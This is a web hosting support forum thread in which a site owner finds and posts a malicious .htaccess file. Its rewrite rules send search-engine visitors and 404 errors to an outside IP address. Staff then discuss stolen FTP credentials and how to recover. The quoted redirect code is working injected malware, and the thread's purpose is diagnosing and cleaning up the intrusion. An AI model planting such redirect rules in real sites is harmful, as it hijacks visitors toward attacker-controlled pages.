Strange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what google has to say.
Regarding mail2forum, you could always have one written...
Strange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what google has to say.
Regarding mail2forum, you could always have one written...
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Found the culprit: the .htaccess file in the root was added or modified with this code:
and the same file was also placed in the public_html folder.Code:RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://87.248.180.90/in.html?s=sg [R,L] Errordocument 404 http://87.248.180.90/in.html?s=sg_err
Good call on the redirection/referrer cause, Matt.
Why was the intrusion allowed in the Root folder? I would think that phpBB doesn't have access to the Root folder?
What can we do to prevent future occurrences?
The logs seem to indicate that your FTP password was compromised. There are some newer exploits out there where a 3rd party site somehow managed to install a trojan on your PC and it sniffs out FTP passwords that have been saved on your PC, then sends them "home" and then "home" uploads all sorts of fun things from htaccess files to new scripts and the link.
The best fix I have found is to run antivirus scans on all computers that you use to access the site via FTP. Once they are clean then change the main cPanel password to something impossible to guess, then setup ftp users for each machine that connects to the site via FTP.... e.g. laoptop@mydomain.com , desktop@mydomain.com , 3rdparty@mydomain.com etc.
Tat way if and when it happens again we can tell you which ftp user was compromised from the logs and you can focus your efforts into figuring out what the security issue is on that unique machine.
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
McAfee scan came back clean. Running Avast scan now...will report results.
Avast scan came back clear as well. This is the only machine I use for FTP connections to my server.
Any other ideas where the compromise might have occurred? Could there be a flaw in cPanel?
Was the old password something easily guessed? I suppose the only other way they could get it is perhaps with a packet sniffer.
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Not easy to guess at all. Where would the packet sniffer intercept my traffic?
Anywhere on the Internet I suppose....
how does a packet sniffer work - Google Search
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |